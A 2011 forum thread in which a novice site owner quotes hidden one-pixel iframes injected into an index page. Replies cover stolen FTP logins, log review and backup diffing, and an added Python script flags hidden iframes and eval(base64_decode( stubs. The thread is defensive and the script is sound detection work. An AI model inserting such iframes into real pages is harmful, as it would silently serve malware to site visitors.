Orionsbelter Posted January 26, 2011

Just got an email from Google saying that my site has malware on it. I looked into this and found that someone has put coding in my index code. Here is the code:

<iframe src="http://bali-planet.com/" width="1" height="1" frameborder="0"></iframe>
<iframe src="http://adsensestat.com/" width="1" height="1" frameborder="0"></iframe>
<iframe src='http://visions7.net/' width=1 height=1 style='visibility:hidden;'></iframe>

I am a newbie at web development and would appreciate it if someone could tell me how this happened and how to avoid it happening in the future. I use a Freehostia paid hosting account, so not sure if there is something happening on their server :S. Thanks for reading.

PFMaBiSmAd Posted January 26, 2011

If the change was actually made to the source code in the file, then someone had sufficient access to the server to be able to read, change, and write the file.

You should get and check the server log files to find out all the information you can about who, what, when, and from where your file got written to.

You should also download a copy of all your files, taking care to NOT overwrite any existing backup copy of your files, and then use a comparison tool, like WinMerge - http://winmerge.org/ - to find all the differences between your last backup copy and the current files, including any new files that are not part of your web page.

tibberous Posted January 26, 2011

Happened to us - our designer got a virus that stole his FTP login. What's weird is that it didn't show up right away. I think they steal the FTP passwords, then attack later on.

Look through your files. You probably have something like thumbnail.php that's just an eval(base64_decode("gf46uy45h6n67n6rmrnw45h... or something similar.

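An added example (not code from any poster in this thread) of the two checks suggested above: it compares a known-good backup with the current files by hash, lists new and changed files, and flags the hidden-iframe and eval(base64_decode( patterns mentioned in the thread. The directory names, file names and sample contents are constructed for the demonstration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Patterns taken from this thread: 0/1-pixel or hidden iframes, and eval(base64_decode( stubs.
PATTERNS = {
    "hidden-iframe": re.compile(
        r"<iframe\b[^>]*(?:width\s*=\s*['\"]?[01]\b|height\s*=\s*['\"]?[01]\b"
        r"|visibility\s*:\s*hidden)", re.I),
    "eval-base64": re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
}

def snapshot(root):
    """Map each file's relative path to its SHA-256 digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def audit(backup, live):
    """Diff the live copy against the last known-good backup and scan what changed."""
    old, new = snapshot(backup), snapshot(live)
    report = {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(f for f in old.keys() & new.keys() if old[f] != new[f]),
        "suspicious": {},
    }
    for rel in report["added"] + report["modified"]:
        text = (Path(live) / rel).read_text(errors="replace")
        hits = [name for name, rx in PATTERNS.items() if rx.search(text)]
        if hits:
            report["suspicious"][rel] = hits
    return report

def demo():
    """Constructed sample data: a clean backup and a tampered live copy."""
    with tempfile.TemporaryDirectory() as tmp:
        backup, live = Path(tmp, "backup"), Path(tmp, "live")
        for d in (backup, live):
            d.mkdir()
            (d / "about.html").write_text("<html><body>About</body></html>")
        (backup / "index.php").write_text("<html><body>Home</body></html>")
        (live / "index.php").write_text(
            "<html><body>Home</body></html><iframe src='http://example.invalid/'"
            " width=1 height=1 style='visibility:hidden;'></iframe>")
        (live / "thumbnail.php").write_text('<?php eval(base64_decode("Q09OU1RSVUNURUQ=")); ?>')
        return audit(backup, live)

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

A file can be altered without matching either pattern, so every entry under "added" and "modified" still needs a manual look.
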
KevinM1 Posted January 26, 2011

> Happened to us - our designer got a virus that stole his FTP login. What's weird is that it didn't show up right away. I think they steal the FTP passwords, then attack later on.

Not so weird. Think about it - there's more than one of these viruses in the wild, right? Depending on how they do their job (simple keylogger? something more sophisticated?), they're all going to be sending back a not insignificant amount of data. Sifting through and testing the accumulated data takes time.